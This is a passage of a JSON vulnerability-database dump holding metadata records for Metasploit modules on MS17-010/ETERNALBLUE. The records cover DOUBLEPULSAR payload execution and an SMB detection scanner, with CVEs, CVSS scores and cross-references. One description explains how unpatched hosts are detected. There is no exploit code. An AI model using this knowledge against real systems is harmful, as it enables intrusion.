["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, 
{"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-14T03:11:42", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-07-14T03:11:42", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", 
"https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1366}, "differentElements": ["published", "modified"], "edition": 67, "lastseen": "2020-07-14T03:11:42"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-08-11T23:21:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", 
"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/UNIX/WEBAPP/WEBTESTER_EXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": 
["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-11T23:21:05", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "bc4baba7087cd44277e80965f65cf0b7", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "lastseen": "2020-08-11T23:21:05", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:16:16", "objectVersion": "1.4", "published": "2019-09-30T19:18:41", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "title": "DOUBLEPULSAR Payload Execution and Neutralization", "type": "metasploit", "viewCount": 1391}, "differentElements": ["published", 
"modified"], "edition": 71, "lastseen": "2020-08-11T23:21:05"}], "viewCount": 1786, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", 
"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-09-30T18:12:04", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-09-30T18:12:04", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/doublepulsar_rce.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, 
{"key": "description", "hash": "79b03fa9178806f1694441cff96d84a3"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "c25dabffe89097874a062017ca347cc8"}, {"key": "published", "hash": "03b7f7b734bdffbd849759d24edab76d"}, {"key": "references", "hash": "2a4acb977d851155649ad6e4f1698975"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "ead92bdcd20cbc918e777e28c4a83623"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "hash": "34a4a1842853199e3b8f4e425f58e25c33802036c3e0a9b9bcecfabfb49e9003", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 SMB RCE Detection", "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. 
It can log on as the user \"\\\" and connect to IPC$.\n", "published": "2017-03-29T23:43:49", "modified": "2020-06-09T12:18:52", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://github.com/countercept/doublepulsar-detection-script", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-08-20T01:40:28", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. 
It can log on as the user \"\\\" and connect to IPC$.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-08-20T01:40:28", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, 
{"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", 
